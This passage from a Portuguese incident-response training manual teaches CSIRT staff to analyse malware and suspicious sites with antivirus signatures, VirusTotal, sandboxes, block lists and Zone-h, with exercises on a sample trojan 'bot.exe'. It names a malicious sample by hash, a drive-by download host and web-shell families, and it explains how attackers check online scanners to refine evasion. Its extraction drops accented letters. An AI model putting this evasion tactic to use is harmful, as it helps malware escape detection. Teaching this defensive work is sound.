Adicionalmente, existem algumas extenses para o navegador web que podem ser utilizadas
para evitar aprimorar a segurana e privacidade da navegao. O site a seguir apresenta um
conjunto de extenses especfcas para cada tipo de browser: http://fxtracking.com/
q Alm dos tradicionais mecanismos de busca, devem-se buscar informaes em fontes
auxiliares, tal como websites de redes sociais e microblogs. Sites como Twitter podem
ser teis para identifcar ataques em andamento ou fazer o planejamento. Uma simples
busca por attack <domnio>, tango down <domnio> e DoS <domno> podem revelar
possveis ataques a um domnio. A seguir, exemplos de informaes de incidentes que
podem ser investigados:
1 Artefato encontrado: muitas vezes informaes contidas nos artefatos encontrados
nos sistema comprometido, tal como: comentrio do cdigo fonte, assinaturas e
hash criptogrfco podem ser teis para identifcar mais detalhes sobre o incidente
investigado;
1 Mtodo de comprometimento: em alguns casos, a forma com que o sistema foi
comprometido pode representar uma assinatura de um ataque. Isso muito obser-
vado em ataques a aplicativos web, onde uma sequncia especfca de comandos
utilizada para comprometer o sistema;
1 Endereo IP: a busca pelo endereo IP que originou o ataque pode revelar infor-
maes surpreendentes. Por exemplo, identifcar que existem fruns de segurana
comentando sobre as atividades maliciosas originadas pelo IP.
Analisadores de malwares
q Muitas vezes, ao investigar um incidente de segurana, a equipe do CSIRT depara-se com
artefatos de atacantes e tambm arquivos maliciosos.
Nesse processo de investigao, a anlise do arquivo malicioso pode revelar mais detalhes
do incidente identifcando, por exemplo, aes desempenhadas pelo arquivo malicioso,
vetores de ataque, motivaes dos atacantes e, at mesmo, o desenvolvedor dos malwares.
O interesse por entender o funcionamento e caractersticas de um arquivo malicioso
uma preocupao recorrente, embora a anlise de malwares seja uma atividade complexa
e carece de conhecimentos especializados. Nem sempre os CSIRTs possuem mo de obra
especializada para investigar malwares, tampouco, tempo hbil para analisar todos os
malwares e artefatos obtidos.
Em alguns incidentes de segurana, no entanto, onde importante que a equipe do CSIRT tente
obter detalhes do comprometimento que, via de regra, passa por uma investigao de malware.
Existem outros
mecanismos de busca
com foco em privaci-
dade. Um dos mais
populares o
DuckDuckGo.com:
http://duckduckgo.com/
w
168

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q Existe um conjunto de tcnicas e ferramentas que podem auxiliar os membros da equipe
na investigao de arquivos maliciosos. Os principais procedimentos consistem em:
1 Assinaturas de malwares: identifcao de caractersticas nicas do malware com as
quais possvel classifcar um arquivo malicioso;
1 Anlise comportamental: aes desempenhadas pelo arquivo malicioso quando
executado no Sistema Operacional.
Por questes didticas, vamos usar um arquivo malicioso especfco nas diferentes anlises
que sero apresentadas:
Nome do Arquivo bot.exe
MD5 d262b68451826588002bcbb27b28dbef
SHA 256
ea5cd9326d4bb1ff89054e57c67e7f6d2925cba543aa-
04f214f90f730c62f1f0
Assinaturas de malwares
Uma das principais ferramentas para combater malwares so os sistemas de antivrus.
As tradicionais ferramentas tentam identifcar uma assinatura uma sequncia caracterstica
de bytes para identifcar um cdigo malicioso.
q A assinatura de um sistema de antivrus til para identifcar as aes de um arquivo
malicioso. A listagem anterior ilustra a execuo do antivrus Clamav (clamscan), anti-
vrus gratuito e de cdigo aberto: http://clamav.net/.
$ clamscan /tmp/bot.exe
/tmp/bot.exe: Trojan.Poebot-21 FOUND
----------- SCAN SUMMARY -----------
Known viruses: 3050244
Engine version: 0.97.8
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.12 MB
Data read: 0.12 MB (ratio 1.00:1)
Time: 8.057 sec (0 m 8 s)
A listagem anterior ilustra a inspeo do arquivo bot.exe, tendo como resultado a assina-
tura Trojan.Poebot-21. O nome da assinatura pode ser utilizado para obter informaes
adicionais signifcantes sobre o malware. Atravs de uma pesquisa no website do fabricante
do antivrus, possvel obter informaes do possvel vetor de infeco e aes desem-
penhadas pelo malware. A fgura 8.4 ilustra os detalhes da assinatura relativa ao malware
Poebot obtida no website da empresa Microsoft (http://www.microsoft.com/security/
portal/threat/). Nessa fgura, possvel obter a descrio do comportamento e funcionali-
dades do malware (payload).
Tabela 8.4
Arquivo malicioso.
169

C
a
p

t
u
l
o


8

-

F
e
r
r
a
m
e
n
t
a
s

p
a
r
a

a
n

l
i
s
e

d
e

i
n
c
i
d
e
n
t
e
s

Sendo assim, o investigador pode supor que a mquina comprometida pelo malware bot.exe
possivelmente faz parte de uma botnet, onde diversas aes maliciosas podem ser desem-
penhadas na rede local e tambm destinadas a redes externas.
As assinaturas de arquivos maliciosos no so padronizadas, ou seja, o nome dado para
cada assinatura dependente das empresas do sistema de antivrus. As empresas de
sistemas de antivrus esto constantemente analisando novos malwares para a identif-
cao de assinaturas que possam indicar um arquivo malicioso. Assim que uma assinatura
identifcada, costuma-se atribuir um nome que identifque a assinatura seguindo a nomen-
clatura da prpria empresa. Logo, um mesmo malware verifcado por um antivrus pode ter
uma assinatura completamente diferentes em outros sistemas de antivrus.
Ferramentas multiantivrus
Existem alguns servios que permitem submeter arquivos suspeitos para deteco de
assinatura em mltiplas ferramentas de antivrus. Dessa forma, possvel identifcar quais
assinaturas so atribudas ao arquivo analisado e, ainda, se o mesmo arquivo classifcado
como malicioso nos diferentes antivrus.
Figura 8.4
Descrio das
funcionalidades
do malware.
170

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Boa parte dos servios que analisam malwares em mltiplas plataformas de antivrus est
disponvel gratuitamente na rede.
q A seguir so apresentados os principais servios para anlise de arquivos maliciosos em
mltiplas ferramentas de antivrus:
1 VirusTotal: https://www.virustotal.com/
1 Virscan: http://www.virscan.org/
1 Metascan: https://www.metascan-online.com/
Mesmo existindo diversos servios para inspeo de arquivos maliciosos, atualmente o
servio mais completo o VirusTotal.
q O VirusTotal um servio gratuito que permite analisar arquivos suspeitos e tambm
URLs em busca de facilitar a deteco rpida de arquivos maliciosos.
Embora a VirusTotal tenha incorporado uma srie de novas anlises adicionais, aps a
sua aquisio pelo Google, este captulo vai ater-se apenas a anlise de assinaturas de
arquivos suspeitos.
q O primeiro passo submeter o arquivo diretamente ao servio online. Para isso, o
VirusTotal permite a submisso de arquivos utilizando diferentes mecanismos:
1 Submisso via website: a maneira mais comum de submeter arquivos para anlise
atravs da interface web. Dessa forma, o usurio pode enviar arquivos para anlise
sem gerar alertas dos sistemas de segurana tal como fltros e IDS usando o
protocolo HTTPS;
1 Submisso via e-mail: o usurio pode compor uma mensagem de e-mail anexando
o arquivo a ser analisado. Como resultado, ser enviada uma mensagem com o resul-
tado para o mesmo remetente;
1 Submisso via aplicativos: atravs de uma interface disponibilizada, possvel
desenvolver ferramentas para submisso. Existem algumas ferramentas desenvol-
vidas para a submisso de arquivos, tais como; extenses de browser, aplicativos
para celulares, aplicativos de desktop, entre outros.
Cada arquivo submetido analisado por todos os sistemas antivrus disponibilizado pelo
VirusTotal.
q Caso o mesmo arquivo (mesmo hash criptogrfco) j tenha sido submetido ao
VirusTotal, possvel:
1 Forar uma nova anlise;
1 Exibir o relatrio da ltima anlise realizada.
A seguir ilustra um exemplo da interface do VirusTotal com o resultado de uma anlise.
171

C
a
p

t
u
l
o


8

-

F
e
r
r
a
m
e
n
t
a
s

p
a
r
a

a
n

l
i
s
e

d
e

i
n
c
i
d
e
n
t
e
s


Como pode ser observado, o malware analisado (bot.exe) foi verifcado por 46 diferentes
antivrus e foram encontradas assinaturas para o malware em 42 deles. Signifca que
4 sistemas de antivrus no identifcaram o arquivo como malicioso. O relatrio descreve
informaes relativas ao sistema de antivrus utilizado, a verso do software, a ltima atuali-
zao da base de dados de vacinas, e o tipo de assinatura detectado. A anlise nos dife-
rentes sistemas til para a comparao da efcincia dos diferentes sistemas de antivrus
em relao ao um arquivo malicioso em especfco.
Alm da submisso de arquivos, o VirusTotal permite consultar a anlise de arquivos j
examinados utilizando um hash criptogrfco (MD5, SHA1, SHA256) do binrio. Esse recurso
permite apenas obter a anlise de um determinado arquivo previamente efetuada; no
entanto, no possvel obter o arquivo executvel originalmente submetido.
Figura 8.5
Resultado de
uma anlise de
um malware (bot.
exe) no servio
VirusTotal.
172

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
173

C
a
p

t
u
l
o


8

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

8
Roteiro de atividades 8
Atividade 8.1 Virustotal
Utilize o malware fornecido (bot.exe) e submeta para o VirusTotal. Responsa as questes
a seguir:
a. A data da primeira submisso do arquivo no servio VirusTotal:
b. Que antivrus no detectaram o arquivo bot.exe como arquivo malicioso.
Anlise comportamental
Alm da busca por assinaturas de um arquivo malicioso, possvel analisar um binrio
usando outras abordagens como, por exemplo, a anlise comportamental. A anlise
comportamental consiste em traar as aes desempenhadas por um arquivo binrio no
Sistema Operacional no qual executado. Essa anlise do funcionamento de arquivos bin-
rios pode ser realizada de duas diferentes maneiras: de forma esttica ou dinmica.
A anlise esttica consiste em avaliar o funcionamento de um programa sem sua execuo,
baseando-se apenas no seu cdigo executvel. As tcnicas mais tradicionais consistem em
extrair instrues do cdigo assembler do programa e inferir concluses com base na sequ-
ncia das instrues. No entanto, a principal defcincia desse mtodo a possibilidade do
cdigo de mquina analisado no refetir o mesmo comportamento que o malware apre-
senta quando executado. O comando strings, por exemplo, pode ser utilizado para obter
mais informaes de um arquivo sem executar o mesmo:
$ strings /tmp/NotaFiscal.exe
<...>
network.proxy.autoconfig_url
network.proxy.no_proxies_on
network.proxy.ftp_port
network.proxy.ftp
<...>
Como ilustrado, o resultado dos comandos strings exibe todos os caracteres que podem ser
visualizados contidos no arquivo executvel. O fragmento citado anteriormente descreve
funes instanciadas pelo malware. Nesse caso, so exibidas funes que alteram a confgu-
rao de rede, mas especifcamente a confgurao do proxy.
174

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
A anlise esttica pouco efciente para programas que utilizam tcnicas de ofuscao ou
polimorfsmo, como o caso do malware Confcker. Nesses casos, a anlise do arquivo pode
dispender maior tempo de anlise e mo de obra especializada. Sendo assim, a anlise
esttica apresenta limitaes para malwares mais complexos, o que motivou o surgimento
de tcnicas complementares, como o caso da anlise dinmica.
A anlise dinmica, por outro lado, consiste em observar as caractersticas funcionais do
malware atravs da sua execuo em um ambiente controlado. As principais metodologias
de anlise dinmica baseiam-se em:
1 Comparao do status do Sistema Operacional antes e imediatamente aps a execuo
do arquivo;
1 Monitorao das aes em tempo de execuo.
Na primeira abordagem, busca-se fazer uma comparao do Sistema Operacional completo
identifcando alteraes causadas pelo arquivo binrio executado. Como resultado, essa
tcnica traa uma viso geral das funcionalidades do binrio, como arquivos criados, dados
removidos, entre outros. Essa soluo, entretanto, no determina mudanas dinmicas
intermedirias ao estado inicial e fnal da comparao do sistema. Mudanas como a criao
de arquivos durante a execuo e a deleo de arquivos antes do fnal do processo so
transparentes a essa anlise. Por outro lado, na segunda abordagem cuja monitorao das
aes do malware dada durante a execuo, tais aes so traadas. Mesmo sendo mais
complexa de implementar, a anlise de binrios durante sua execuo vem popularizando-
-se devido ao bom resultado da tcnica perante cdigos polimrfcos e ofuscados.
A principal limitao da anlise dinmica de malware a possibilidade de executar apenas
uma amostra de binrio de cada vez. Afnal, a execuo de outros binrios no mesmo
ambiente controlado difculta a distino das aes de cada malware.
Com a utilizao de tecnologias de virtualizao de sistemas, a anlise dinmica de
malwares ganhou outra dimenso. De fato, a facilidade de reconstruir um ambiente virtu-
alizado permitiu o surgimento de ferramentas mais detalhistas e escalveis para a anlise
dinmica, como o caso dos sandboxes.
Sandbox
Sandboxes so sistemas automatizados para anlise de malware onde se busca executar as
aes de um malware em um sistema isolado, geralmente atravs do uso de uma mquina
virtual. Dessa forma, possvel identifcar aes executadas por um arquivo suspeito sem
comprometer um sistema em produo.
Tipicamente, os sandboxes so utilizados para processar um grande nmero de malwares
e obter caractersticas de um arquivo suspeito. Essa anlise inicial permite identifcar certas
aes suspeitas desempenhadas pelo arquivo analisado e classifc-lo como malicioso.
Os sandboxes so muito utilizados para efetuar uma anlise instantnea das aes do
malware evitando, muitas vezes, que tcnicas mais sofsticadas, tal como engenharia
reversa, seja demandada.
Em ambientes com equipes com tamanho reduzido, importante que um sandbox seja fcil
de ser utilizado e fornea um resumo de alto nvel das atividades maliciosas conduzidas
durante a anlise. Isso faz com que o malware seja mais acessvel e permite que qualquer
pessoa possa conduzir os primeiros estgios da investigao. No caso de obter dados inte-
ressantes, o caso pode ser repassado para anlise do time ou para parceiros externos.
175

C
a
p

t
u
l
o


8

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

8
Evidentemente que a implementao de solues baseadas em sandbox requer cuidados
especiais de segurana, tais como restrio de acesso rede. Existem algumas solues no
mercado que permitem o prprio CSIRT implementar um sandbox local e automatizar boa
parte das tarefas de anlise. Por outro lado, existem diversas ferramentas automatizadas
para anlise de malware disponvel na web, cada qual com suas caractersticas e funcionali-
dades. Na sequncia, so apresentadas algumas ferramentas disponibilizadas para anlise
de malware de forma gratuita:
1 Anubis: http://anubis.iseclab.org/
1 Malwr: https://malwr.com/submission/
1 Comodo: http://camas.comodo.com/
1 EUREKA: http://eureka.cyber-ta.org/
1 ThreatExpert: http://www.threatexpert.com/submit.aspx
1 ThreatTrack: http://www.threattracksecurity.com/resources/sandbox-malware-analysis.aspx
1 ViCheck: https://www.vicheck.ca/
1 Xandora: http://www.xandora.net/xangui/
Como caracterstica, os sandboxes tradicionalmente simulam o Sistema Operacional
Windows, afnal, a grande maioria de malwares existentes escrita para esse sistema.
Funes comuns observadas pelo sandbox descrevem funcionalidades como:
1 Arquivos criados ou modifcados;
1 Acessos ou modifcaes a chave do registro do sistema;
1 Bibliotecas dinmicas carregadas;
1 reas da memria virtual utilizada;
1 Processos criados;
1 Conexes de rede instanciadas;
1 Dados transmitidos pela rede.
Os relatrios disponibilizados pelos sandboxes podem variar bastante devido a particula-
ridades de implementao. Caractersticas como o Sistema Operacional no qual o arquivo
suspeito executado; arquitetura implementada; e o conjunto de chamadas de sistema
monitorado pelo sandbox refete diretamente no relatrio disponibilizado pela ferramenta.
O sandbox Anubis, por exemplo, uma ferramenta para anlise de malwares disponvel gra-
tuitamente na web que permite anlise de arquivos executveis para a plataforma Windows
e tambm aplicaes para sistemas Android. Para isso, o Anubis utiliza como base o software
Qemu, que permite emular Sistemas Operacionais e monitorar chamadas de sistemas
instanciadas pelos arquivos analisados. Como resultado, disponibilizado um relatrio
detalhado das funcionalidades do arquivo suspeito analisado.
176

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
A fgura ilustra um fragmento de um relatrio de anlise disponibilizado pelo Anubis.
Como pode ser visto, na parte superior (Summary) so descritas as principais aes desem-
penhadas pelo arquivo analisado. Essas informaes so compostas com base nas cha-
madas de sistema solicitadas pelo arquivo durante sua execuo no ambiente controlado.
Diferentemente do sandbox Anubis, o sandbox de cdigo aberto Cuckoo Sandbox integra as
plataformas mais comuns de virtualizao como VirtualBox e VMware para executar e regis-
trar atividades desempenhadas por um arquivo suspeito. Dessa forma, possvel utilizar
as plataformas de virtualizao para especifcar qual o Sistema Operacional ser emulado
(Windows ou Linux) pelo sandbox. Portanto, o Cuckoo permite instanciar diversas mquinas
virtuais com as mais diferentes confguraes de Sistemas Operacionais e arquiteturas.
O Cuckoo tambm permite interagir durante a execuo do malware. Em alguns casos,
certas funcionalidades de malwares s so ativadas em situaes especfcas, tal como
acesso a um website bancrio.
Por tratar-se de um software livre e de cdigo aberto, o Cuckoo Sandobox permite com que
todo o seu sistema seja copiado para um servidor e instanciado localmente. Sendo, portanto,
muito til para montar um laboratrio de anlise de malware de uma instituio. Do contrrio,
sem a necessidade de instalar o sistema, possvel usar servios online que implementam a
ferramenta Cuckoo via interface web. Um exemplo o site Malwr: https://malwr.com/
O Malwr funciona como uma interface para o sandbox Cuckoo. Todo arquivo submetido via inter-
face web instancia uma mquina virtual e ativa o servio de anlise. Como resultado, exibida
uma pgina web com as caractersticas de execuo do arquivo analisado (vide fgura 8.7).
O Malwr mantm uma base de dados com informaes de todos os malwares j submetidos
ao sistema. Atravs de uma consulta do cdigo hash de um arquivo executvel possvel
Figura 8.1
Fragmento de um
relatrio das aes
de um malwares
disponibilizado pelo
sandbox Anbis.
177

C
a
p

t
u
l
o


8

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

8
visualizar quando foi ltima anlise do mesmo, ou ainda, se identifcar que o arquivo exe-
cutvel submetido nunca foi analisado pelo sistema.
A imagem apresenta um fragmento do relatrio de funcionalidades de um malware anali-
sado pelo servio Malwr. Como resultado, possvel ter uma viso geral das funcionalidades
do malware incluindo anlise esttica, anlise comportamental, anlise de rede e arquivos
obtidos (dropped fles). O relatrio agrupado em categorias, onde possvel visualizar
mais detalhes do arquivo analisado.
Por fm, os relatrios fornecidos por algumas ferramentas so bastante descritivos e per-
mitem uma viso razovel quanto s aes de um arquivo executvel. As diferentes tcnicas
de anlise de arquivos binrios recm-descritas possuem o mesmo objetivo: lidar com a
rdua tarefa de identifcar as funcionalidades de um arquivo executvel. A utilizao das
distintas metodologias, em particular, pode ser combinada e permitir que o CSIRT obtenha
mais informaes relativas ao incidente a ser investigado.
Atividade 8.2 Anlise dinmica de arquivos maliciosos
Utilize o malware fornecido (bot.exe) e submeta para um dos servios recm-descritos
(Anubis ou Malwr). Responda as seguintes perguntas:
a. Quais so as principais funcionalidades do arquivo bot.exe?
Figura 8.2
Fragmento
do relatrio
das aes de
um malware
disponibilizado
pelo sandbox
Malwr.
178

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
b. O sandbox mapeou alguma atividade de rede desempenhada pelo malware?
c. Quais softwares so afetados pelo malware?
Consideraes sobre o uso de ferramentas online
Sandboxes e antivrus online podem fornecer uma primeira impresso de maneira fcil de
arquivos desconhecidos. Na maioria dos casos, a utilizao desses servios requerer poucas
habilidades do usurio. Afnal, tais servios tm foco na usabilidade dos usurios e so espe-
cifcados justamente para ocultar a complexidade dos sistemas de anlise, muito embora
existam sistemas mais complexos com alto nvel de parametrizao e customizao.
Sabe-se que esses servios so muito utilizados para uma anlise rpida de arquivos; no
entanto, devem-se compreender os riscos associados a esses servios. Mesmo que um
arquivo no seja detectado como malicioso pelos sistemas de varredura (antivrus ou
sandboxes), isso no necessariamente signifca que se trata de um arquivo no malicioso.
O contrrio tambm verdadeiro: caso o arquivo seja avaliado como malicioso por alguns
softwares, isso no signifca que se trata de um arquivo malicioso.
essencial lembrar que boa parte dos servios gratuitos online compartilham as informa-
es com terceiros. Logo, instituies com informaes crticas segurana nacional, por
exemplo devem reconsiderar o uso desses servios. Afnal, alguns malwares so desen-
volvidos para alvos especfcos e podem conter informaes sensveis de uma instituio
embutidos em si, tal como senhas, IPs e URLs.
Essas ferramentas de anlise, alm de compartilhar informaes com terceiros (empresas
de segurana e fabricantes de antivrus), disponibilizam de forma pblica os resultados.
Todos os usurios podem consultar as informaes dos malwares analisados pelo sistema,
inclusive o prprio autor do malware. Nada impede que um atacante possa utilizar os sis-
temas de anlise de arquivos online como uma fonte de informao.
Um atacante mais experiente pode desenvolver um malware especfco com nico hash
criptogrfco (md5) destinado a uma instituio. Aps um perodo, o prprio atacante pode
consultar em ferramentas online pelo hash criptogrfco e, com isso, saber se o malware foi
identifcado. Dessa forma, o atacante pode aperfeioar suas tcnicas de evaso e aprimorar
suas tticas para conseguir o seu objetivo.
Analisadores de websites
De forma anloga aos servios que analisam arquivos binrios, possvel encontrar fer-
ramentas especializadas na anlise de contedo web. Alguns servios buscam auxiliar na
identifcao de websites com contedos maliciosos, compreendendo:
Falso positivo e falso
negativo so sempre
um risco para sistemas
de deteco. Por
exemplo, alguns
antivrus classifcam
plug-ins lcitos de
segurana bancria
como malicioso. Por
outro lado, certos
arquivos maliciosos no
caracterizados como
legtimos por ainda no
possurem assinatura
nos sistemas de
segurana.
l
179

C
a
p

t
u
l
o


8

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

8
1 Drive-by-download;
1 Arquivos fash maliciosos;
1 Javascript maliciosos;
1 Applets;
1 iframes ocultos;
1 Cross Site Scripting (XSS);
1 Redirecionamentos maliciosos;
1 Backdoors (e.g., C99, R57 e Webshells).
Tipicamente, os servios de anlise recebem como entrada uma URL para ser processada
pelo sistema. A partir desse momento, a ferramenta acessa a URL especifcada utilizando
um ambiente controlado (sandbox), que podem ser confgurados de diferentes formas
para avaliar um website suspeito. A confgurao dos sistemas pode ser til para identifcar
contedos maliciosos destinados a um determinado alvo, como por exemplo: um navegador
particular (User-Agent), plug-ins com verses especfcas ( Java) ou ainda determinados Sis-
temas Operacionais.
Uma das ferramentas mais populares para anlise de contedo o Wepawet. O Wepawet um
servio online gratuito que busca analisar as aes desencadeadas por uma pgina web quando
acessada. Para isso, so utilizadas diferentes tcnicas e abordagens a fm de mapear possveis
aes maliciosas no Sistema Operacional que acessa um site possivelmente comprometido.
Para cada URL submetida, o Wepawet, instancia um browser em um sistema virtualizado
e mapeia todas as modifcaes ocorridas no Sistema Operacional virtual. Atravs de uma
heurstica, o sistema determina se o site malicioso ou no. Dessa forma, diferentes tipos
de ataques podem ser determinados sem o comprometimento de um sistema de produo.
Como comentado, certos ataques so direcionados a um conjunto especfco de clientes
que acessam o website. Para lidar com isso, o Wepawet permite inserir cabealhos (REFER) e
confgurar um servidor proxy a ser utilizado na anlise.
Alm do Wepawet, existem outras ferramentas com funcionamento similar para analisar o
contedo de website maliciosos:
1 http://urlquery.net/report.php
1 http://sitecheck.sucuri.net/
180

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
A imagem ilustra o resultado de uma anlise disponibilizada pela ferramenta urlQuery.
Na parte superior, so exibidos alguns detalhes da anlise, tal como: informaes do
domnio da URL; a confgurao utilizada pelo browser que acessou a URL analisada; e
assinatura maliciosa detectada por um sistema IDS. J na parte inferior possvel visualizar
as transaes HTTP desencadeadas pelo website. Como destacado, o site asabrasil.org.br
faz uma requisio de download para um arquivo malicioso hospedado em nemohildiin.ru.
Isso pode identifcar um ataque denominado driven-by-download comprovante que o
website original possivelmente foi comprometido.
Assim como outros servios baseados em sandboxes, as solues no fornecem deteco
100% do contedo malicioso. Algumas tcnicas podem ser utilizadas para identifcar um
sistema virtualizado (sandbox), fazendo com que a anlise de arquivos apresente resultados
imprecisos. Alm do mais, certas confguraes do sandbox podem ser incompatibilidades
com o esperado pelos atacantes deixando o contedo malicioso dormente.
Figura 8.3
Anlise usando
a ferramenta
urlQuery
demonstrando
um ataque do
tipo driven-by-
download.
181

C
a
p

t
u
l
o


8

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

8
Outros servios online
Alm dos servios de anlise de malware e de website, existe um conjunto de servios online
e gratuitos que podem ser utilizados para obter mais informaes sobre um incidente inves-
tigado. Nesse contexto, podem ser utilizados os mais diversos servios, tal como listas de
bloqueio e repositrios de websites desfgurados.
Listas de bloqueio
So listas que descrevem recursos de rede IPs, blocos de endereamento, URLs e domnios
relacionados com atividade maliciosa. Boa parte dessas informaes provida por insti-
tuies que constantemente fazem anlise de malwares, spams e phishings. Dessa forma,
possvel ter uma lista com informaes atualizadas dos principais recursos comprometidos
identifcados pelas diversas instituies.
Essas listas de bloqueio usualmente referenciadas black list so segmentadas em dife-
rentes categorias:
1 Mquinas originadoras de spams;
1 Mquinas infectadas por um determinado malware;
1 Websites com contedo malicioso;
1 Website utilizados em fraudes.
As listas de bloqueio, em sua maioria, so independentes. Logo, perfeitamente factvel
encontrar um recurso de rede replicado nas mais diversas categorias. Por exemplo, um IP
que foi detectado como originador de spam provavelmente estar presente em uma lista de
mquinas originadoras de spams. Da mesma forma, se o mesmo IP estiver comprometido
e est atuando como um controlador de botnet, o mesmo pode ser mapeado tambm para
uma lista de mquinas infectadas.
Logo, utilizar essas fontes de informaes de listas de bloqueio podem revelar valiosas infor-
maes sobre um IP ou domnio em questo. Nem sempre essas informaes das diferentes
listas podem ser compostas de forma unifcada. Quando se deseja consultar informaes
relativas a certos recursos comprometidos, necessrio buscar nas mais diversas listas, o
que pode ser trabalhoso. Felizmente, existem alguns servios online onde possvel buscar
por informaes de bloqueio em mltiplas listas ao mesmo tempo, como por exemplo: Um
desses servios o projeto Anti-Abuse.
1 Anti-Abuse: http://www.anti-abuse.org/
1 SPAM database loookup: http://www.dnsbl.info/
O Anti-Abuse disponibiliza um website onde possvel automaticamente buscar uma infor-
mao em mltiplas listas de bloqueio. Atualmente o website indexa mais de 50 listas de
bloqueio. A busca em mltiplas listas revela rapidamente se um IP ou domnio foi identi-
fcado como originador de aes maliciosas. importante notar que, mesmo que o IP ou
domnio no esteja listado em uma lista de bloqueio, no signifca que est seguro. Do con-
trrio, quando um IP listado em mltiplas listas de bloqueio, podemos supor que existem
fortes indcios de um comprometimento. Algumas listas de bloqueio populares so:
1 The Spamhaus Block List: http://www.spamhaus.org/sbl/index.lasso
1 A spam blacklist made in Switzerland: http://dnsbl.abuse.ch
1 SpamCop: http://www.spamcop.net/
182

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
1 Google Safe Browsing: https://developers.google.com/safe-browsing/
1 Phish Tank: http://www.phishtank.com/
1 Yandex: http://help.yandex.com/mail/account/white-list-and-black-list.xml
1 Malware Patrol: http://www.malware.com.br/
importante ressaltar que as listas de bloqueio podem ser mantidas por empresas comer-
ciais ou por grupos de voluntrios. Cada uma tem suas particularidades, tais como: critrios
para ser listado; e maneiras de remover um endereo listado. Alm de descreve os IPs e
nomes possivelmente comprometidos, alguns administradores utilizam block lists em dis-
positivos de redes (frewall, roteadores, servidores de e-mail) para sumariamente bloquear
acesso aos sistemas. Logo, IPs listados em block lists podem ter problemas para acessar
determinados IPs. A poltica de uso de listas diferente para cada administrador de rede.
Alguns utilizam poucas listas e outros, muitas listas.
Por fm, deve-se evitar serem listados por uma lista de bloqueio para que os acessos de sua
organizao no sejam limitados por outras instituies. E, quando for o caso, consulte os
procedimentos de remoo da prpria lista em que um dos seus recursos foi listado.
Atividade 8.3 Pesquisando por sites relacionados com fraudes
a. Acesse o site do Phishing Tank [1] e busque por phishings relacionados a bancos brasi-
leiros. Qual foi o ltimo phishing relativo ao Banco do Brasil?
[1] http://www.phishtank.com/target_search.php
b. Acesse o website do Phishing Tank [2] e localize todos os phishings ativos relacionados ao
AS da RNP (AS 1916). Existe algum phishing vlido e online? Qual o alvo do phishing?
[2] http://www.phishtank.com/asn_search.php
Repositrio de websites desfigurados
Zone-h uma base de dados de websites desfgurados. O portal Zone-h permite que qual-
quer usurio, incluindo o prprio atacante, reporte URLs de pginas comprometidas. Assim
que uma URL entra no sistema, o site correspondente URL clonado pelos servidores do
Zone-h e verifcado manualmente pela equipe do Zone-h. Dessa forma, toda URL submetida
verifcada em busca de falsos positivos.
O Zone-h disponibiliza uma base de dados com: a) website a serem verifcados (on-hold) e,
b) websites com desfgurao confrmada (arquive). Segundo o prprio portal, o objetivo
observar tendncias e mapear caractersticas dos ataques, tal como aplicaes e vulnerabili-
dades exploradas nos ataques.
Entre os principais utilizadores do portal esto grupos de cibercriminosos ou ativistas que
utilizam o Zone-h como um ranking. Dessa maneira, para cada desfgurao realizada, o
prprio atacante encarrega-se de reportar ao portal Zone-h. Como resultado, o Zone-h
apresenta um ranking dos principais reportadores (grupos de hackers) e o respectivo
nmero de desfiguraes.
183

C
a
p

t
u
l
o


8

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

8
Apenar de ser um portal bastante controverso e, at mesmo banido em alguns pases, o
Zone-h pode ser utilizado como mais uma fonte de informaes sobre possveis comprome-
timentos. Por exemplo, possvel consultar por um website comprometido mesmo que no
esteja mais online. A fgura ilustra detalhes dos ltimos websites comprometidos apresen-
tando o usurio que notifcou (notifer), URL do website, Sistema Operacional do servidor
que hospeda a pgina alterada (OS) e uma cpia do website alterado (mirror).
Atividade 8.4 Identificar servidores que j foram comprometidos utilizando a
base de dados do zone-h
Acesse a base de dados do zone-h em busca de sites comprometidos:
Acesse: http://www.zone-h.org/
Menu: Attack Archive
Verifque a existncia de websites desfgurados relacionados com o Brasil, ou seja, domnios
terminados com .br. Identifque o ltimo site desfgurado (.br) inserido na base do zone-h.
Figura 8.4
Base de dados
com websites que
foram ou esto
desfgurados.
184

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Anlise de artefatos
Mesmo no sendo o escopo deste captulo, interessante ter uma viso das ferramentas
que podem ser teis em casos que exigem uma anlise mais aprofundada de artefatos. A
tabela a seguir sumariza algumas ferramentas que podem ser utilizadas para analisar os
mais diversos arquivos suspeitos e assim pode ser utilizada como ponto de partida para
iniciar a investigao de incidentes mais complexos. Lembre-se de que a Escola Superior de
Redes (ESR) possui um curso prprio de anlise de malware.
Funcionalidade Ferramentas de anlise
Decodificar JavaScript
Firefox Firebug, Rhino debugger, JS-Beautify, SpiderMonkey, V8, Windows
Script Decoder e Jsunpack
Analisar arquivos Flash SWFTtools, flasm, flare e RABCDAsm
Analisar executveis suspeitos
Upx, packerid, xorsearch, xortool, ClamAV, ssdeep, md5deep, pescanner,
pev, pyew e bytehist
Analisar documentos maliciosos Pdftk, Origami Framework, PDF X-RAY, Peedpdf, Jsunpack e OfficeMalScanner
